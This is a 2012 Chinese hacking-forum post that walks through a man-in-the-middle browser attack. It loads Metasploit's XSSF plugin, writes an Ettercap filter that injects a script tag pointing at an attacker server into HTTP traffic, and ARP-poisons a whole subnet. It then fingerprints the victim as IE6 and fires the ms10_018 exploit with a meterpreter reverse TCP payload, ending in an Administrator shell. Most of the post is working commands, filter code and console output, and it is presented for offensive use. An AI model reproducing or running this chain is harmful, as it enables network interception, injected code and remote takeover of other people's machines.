切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
252 Xssf and Arp[复制链接]
发表于 2012-9-11 23:25:18 | 显示全部楼层 |!read_mode!
前言

为了对付层出不穷的网络威胁,市场上出现了很多软件产品,专家们也给出了很多建议。尽管这些产品和建议使用户在上网浏览时会错误地产生安全感,但是却无法解决应用层的安全漏洞问题。Web浏览器集成在系统当中,需要依靠共享的基础组件工作,这种类似IE浏览器和Windows操作系统之间的关系加剧了浏览器的安全风险,其弱点很可能被不法分子加以利用。

Web技术缺乏多样性IE浏览器在桌面浏览器技术中已经占据统治地位。浏览器的同质化对于系统的兼容性也许是好事,但是对于网络安全却不是好事,浏览器的缺陷直接影响到数量巨大的用户。一旦不法分子利用浏览器中的安全漏洞实施攻击,由于多数企业网络的安全措施只有简单的用户名和密码,企业网络都将面临灭顶之灾,后果不堪想象。

单纯的攻击方式已经不在满足渗透者的需求 我们需要非主流

生成你的xssf

攻击方式最为灵活的xssf,我选择了包含攻击种类最多的Metasploit,参考1

  1. msf > load xssf
  2. [-] Your Ruby version is 1.9.2. Make sure your version is up-to-date with the last non-vulnerable version before using XSSF!

  3. ____  ____   ______    ______   ________  
  4. |_  _||_  _|.' ____ \ .' ____ \ |_   __  |
  5.   \ \  / /  | (___ \_|| (___ \_|  | |_ \_|
  6.    > `' <    _.____`.  _.____`.   |  _|   
  7. _/ /'`\ \_ | \____) || \____) | _| |_     
  8. |____||____| \______.' \______.'|_____| Cross-Site Scripting Framework 2.1
  9.                                           Ludovic Courgnaud - CONIX Security

  10. [+] Please use command 'xssf_urls' to see useful XSSF URLs
  11. [*] Successfully loaded plugin: xssf
  12. msf > xssf_urls
  13. [+] XSSF Server      : 'http://222.219.171.92:8888/'        or 'http://:8888/'
  14. [+] Generic XSS injection: 'http://222.219.171.92:8888/loop'     or 'http://:8888/loop'
  15. [+] XSSF test page   : 'http://222.219.171.92:8888/test.html' or 'http://:8888/test.html'

  16. [+] XSSF Tunnel Proxy    : 'localhost:8889'
  17. [+] XSSF logs page  : 'http://localhost:8889/gui.html?guipage=main'
  18. [+] XSSF statistics page: 'http://localhost:8889/gui.html?guipage=stats'
  19. [+] XSSF help page  : 'http://localhost:8889/gui.html?guipage=help'
  20. msf >
复制代码
生成你的Ettercap规则参考2 各位大牛别搞我IP。。
  1. if (ip.proto == TCP && tcp.dst == 80) {
  2.     if (search(DATA.data, "Accept-Encoding")) {
  3.            replace("Accept-Encoding", "Accept-Nothing!");
  4.       }
  5. }
  6. if (ip.proto == TCP && tcp.src == 80) {
  7.         if (search(DATA.data, "")) {
  8.                 replace("", "<script type="text/javascript" src="\"http://222.219.171.92:8888/1.js\""></script>");
  9.                 msg("Codice iniettatto...\n");
  10.         }
  11.         if (search(DATA.data, "")) {
  12.                 replace("", "<script type="text/javascript" src="\"http://222.219.171.92:8888/1.js\""></script> ");
  13.                 msg("Codice iniettatto...\n");
  14.         }
  15. }
复制代码
编译执行 启动ARP
  1. root@Dis9Team:/tmp# nano xss
  2. root@Dis9Team:/tmp# etterfilter xss -o xss.ef

  3. etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA

  4. 12 protocol tables loaded:
  5.      DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

  6. 11 constants loaded:
  7.      VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

  8. Parsing source file 'xss'  done.

  9. Unfolding the meta-tree  done.

  10. Converting labels to real offsets  done.

  11. Writing output to 'xss.ef'  done.

  12. -> Script encoded into 20 instructions.
  13. root@Dis9Team:/tmp# ettercap -T -q -i vmnet8 -F xss.ef -M ARP // // -P autoadd
  14. ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

  15. Content filters loaded from xss.ef...
  16. Listening on vmnet8... (Ethernet)

  17. vmnet8 -> 00:50:56:C0:00:08           5.5.5.1     255.255.255.0

  18. SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
  19. Privileges dropped to UID 65534 GID 65534...

  20.   28 plugins
  21.   39 protocol dissectors
  22.   53 ports monitored
  23. 7587 mac vendor fingerprint
  24. 1698 tcp OS fingerprint
  25. 2183 known services

  26. Randomizing 255 hosts for scanning...
  27. Scanning the whole netmask for 255 hosts...
  28. * |==================================================>| 100.00 %

  29. 1 hosts added to the hosts list...

  30. ARP poisoning victims:

  31. GROUP 1 : ANY (all the hosts in the list)

  32. GROUP 2 : ANY (all the hosts in the list)
  33. Starting Unified sniffing...

  34. Text only Interface activated...
  35. Hit 'h' for inline help

  36. Activating autoadd plugin...
复制代码
测试目标机访问当目标浏览80端口的时候 并且网页中有元素,ETTERCAP就会劫持我数据 注入我们的XSS地址

浏览器的脆弱利用更具你浏览器的版本 选择对应的EXPLOIT
  1. msf > xssf_victims

  2. Victims
  3. =======

  4. id  xssf_server_id  active  ip              interval  browser_name       browser_version  cookie
  5. --  --------------  ------  --              --------  ------------       ---------------  ------
  6. 1   1               true    222.219.171.92  5         Internet Explorer  6.0              YES

  7. [*] Use xssf_information [VictimID] to see more information about a victim
  8. msf > xssf_information 1

  9. INFORMATION ABOUT VICTIM 1
  10. ============================
  11. IP ADDRESS         : 222.219.171.92
  12. ACTIVE ?         : TRUE
  13. FIRST REQUEST         : 2012-03-07 16:39:56 UTC
  14. LAST REQUEST         : 2012-03-07 16:40:06 UTC
  15. CONNECTION TIME : 0hr 0min 10sec
  16. BROWSER NAME         : Internet Explorer
  17. BROWSER VERSION : 6.0
  18. OS NAME                : Windows
  19. OS VERSION         : XP
  20. ARCHITECTURE         : ARCH_X86
  21. LOCATION         : http://222.219.171.92:8888
  22. XSSF COOKIE ?        : YES
  23. RUNNING ATTACK         : NONE
  24. WAITING ATTACKS : 0
  25. msf >
复制代码
从上面可以看出 目标是WINDOWS IE6
搜索IE6
  1. msf > search ie6

  2. Matching Modules
  3. ================

  4.    Name                                                       Disclosure Date  Rank     Description
  5.    ----                                                       ---------------  ----     -----------
  6.    auxiliary/xssf/public/old_browsers/bypass_sop_ie6                           normal   SOP Bypass
  7.    exploit/windows/browser/adobe_flashplayer_avm              2011-03-15       good     Adobe Flash Player AVM Bytecode Verification Vulnerability
  8.    exploit/windows/browser/hp_loadrunner_addfile              2008-01-25       normal   Persits XUpload ActiveX AddFile Buffer Overflow
  9.    exploit/windows/browser/hp_loadrunner_addfolder            2007-12-25       good     HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow
  10.    exploit/windows/browser/ms06_013_createtextrange           2006-03-19       normal   Internet Explorer createTextRange() Code Execution
  11.    exploit/windows/browser/ms06_071_xml_core                  2006-10-10       normal   Internet Explorer XML Core Services HTTP Request Handling
  12.    exploit/windows/browser/ms07_017_ani_loadimage_chunksize   2007-03-28       great    Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
  13.    exploit/windows/browser/ms09_043_owc_htmlurl               2009-08-11       normal   Microsoft OWC Spreadsheet HTMLURL Buffer Overflow
  14.    exploit/windows/browser/ms10_018_ie_behaviors              2010-03-09       good     Internet Explorer DHTML Behaviors Use After Free
  15.    exploit/windows/browser/nctaudiofile2_setformatlikesample  2007-01-24       normal   NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow
  16.    exploit/windows/browser/realplayer_qcp                     2011-08-16       average  RealNetworks Realplayer QCP Parsing Heap Overflow
  17.    exploit/windows/browser/teechart_pro                       2011-08-11       normal   TeeChart Professional ActiveX Control
复制代码
很多 选择一个Rank指为GOOD的吧
  1. exploit/windows/browser/ms10_018_ie_behaviors              2010-03-09       good     Internet Explorer DHTML Behaviors Use After Free
复制代码
用这个
  1. msf > use exploit/windows/browser/ms10_018_ie_behaviors
  2. msf  exploit(ms10_018_ie_behaviors) > set PAYLOAD windows/meterpreter/reverse_tcp
  3. PAYLOAD => windows/meterpreter/reverse_tcp
  4. msf  exploit(ms10_018_ie_behaviors) > set LHOST 5.5.5.1
  5. LHOST => 5.5.5.1
  6. msf  exploit(ms10_018_ie_behaviors) > exploit
  7. [*] Exploit running as background job.

  8. [*] Started reverse handler on 5.5.5.1:4444
  9. [*] Using URL: http://0.0.0.0:8080/l13ec55pR44
  10. [*]  Local IP: http://222.219.171.92:8080/l13ec55pR44
  11. msf  exploit(ms10_018_ie_behaviors) >
  12. [*] Server started.

  13. msf  exploit(ms10_018_ie_behaviors) > jobs

  14. Jobs
  15. ====

  16.   Id  Name
  17.   --  ----
  18.   0   Exploit: windows/browser/ms10_018_ie_behaviors

  19. msf  exploit(ms10_018_ie_behaviors) >
复制代码
进行利用
  1. msf  exploit(ms10_018_ie_behaviors) > xssf_exploit 1 0
  2. [*] Searching Metasploit launched module with JobID = '0'...
  3. [+] A running exploit exists: 'Exploit: windows/browser/ms10_018_ie_behaviors'
  4. [*] Exploit execution started, press [CTRL + C] to stop it !

  5. [+] Remaining victims to attack: [1 (1)]

  6. [*] Sending Internet Explorer DHTML Behaviors Use After Free to 222.219.171.92:48378 (target: IE 6 SP0-SP2 (onclick))...

  7. [+] Code 'Exploit: windows/browser/ms10_018_ie_behaviors' sent to victim '1'
  8. [+] Remaining victims to attack: NONE
  9. [*] Sending Internet Explorer DHTML Behaviors Use After Free to 222.219.171.92:44503 (target: IE 6 SP0-SP2 (onclick))...
  10. [*] Sending stage (752128 bytes) to 5.5.5.129
  11. [*] Meterpreter session 1 opened (5.5.5.1:4444 -> 5.5.5.129:1343) at 2012-03-07 16:45:18 +0800
  12. [*] Session ID 1 (5.5.5.1:4444 -> 5.5.5.129:1343) processing InitialAutoRunScript 'migrate -f'
  13. [*] Current server process: iexplore.exe (3436)
  14. [*] Spawning notepad.exe process to migrate to
  15. [+] Migrating to 3332
  16. [+] Successfully migrated to process

  17. msf  exploit(ms10_018_ie_behaviors) > sessions

  18. Active sessions
  19. ===============

  20.   Id  Type                   Information                                      Connection
  21.   --  ----                   -----------                                      ----------
  22.   1   meterpreter x86/win32  DIS9TEAM-612ADE\Administrator @ DIS9TEAM-612ADE  5.5.5.1:4444 -> 5.5.5.129:1343 (5.5.5.129)

  23. msf  exploit(ms10_018_ie_behaviors) > sessions -i 1
  24. [*] Starting interaction with 1...

  25. meterpreter > getuid
  26. Server username: DIS9TEAM-612ADE\Administrator
  27. meterpreter >
复制代码




附件: 你需要登录才可以下载或查看附件。没有帐号?加入Team
操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-10-1 20:18

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部